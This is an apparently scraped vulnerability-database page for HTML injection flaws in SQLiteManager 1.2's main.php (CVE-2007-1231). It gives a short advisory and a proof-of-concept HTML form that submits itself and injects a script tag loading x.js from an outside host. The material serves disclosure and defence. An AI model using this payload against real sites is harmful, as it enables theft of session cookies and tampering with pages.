Lucene search
+L

SQLiteManager 1.2 - 'main.php' Multiple HTML Injection Vulnerabilities

🗓️ 26 Feb 2007 00:00:00Reported by Simon BonnardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

SQLiteManager 1.2 HTML Injection Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
SQLiteManager include/config.inc.php SQLiteManager_currentTheme Cookie Local File Inclusion
26 Feb 200700:00
nessus
Circl
CVE-2007-1231
10 Aug 200900:00
circl
CVE
CVE-2007-1231
3 Mar 200719:00
cve
Cvelist
CVE-2007-1231
3 Mar 200719:00
cvelist
Exploit DB
SQLiteManager 1.2 - 'main.php' Cross-Site Scripting
10 Aug 200900:00
exploitdb
EUVD
EUVD-2007-1228
7 Oct 202500:30
euvd
NVD
CVE-2007-1231
3 Mar 200719:19
nvd
Prion
Cross site scripting
3 Mar 200719:19
prion
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
26 Feb 200700:00
securityvulns
source: https://www.securityfocus.com/bid/22731/info

SQLiteManager is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

Version 1.2.0 is vulnerable; other versions may also be affected.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <body> <form id="editform" name="editform" method="post" action="http://www.example.com/sqlitemanager/main.php" enctype="multipart/form-data"> <input type="text" name="dbname" value='"><script src=http://www.0x000000.com/x.js></script><"' /> <input type="text" name="dbVersion" value="2" /> <input type="text" name="dbRealpath" value="" /> <input type="text" name="filename" value="" /> <input type="text" name="dbpath" value="" /> <input type="text" name="action" value="saveDb" /> <input name="Save" value="Save page" type="submit"> </form> <script>document.forms[0].submit();</script> </body> </html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01535
32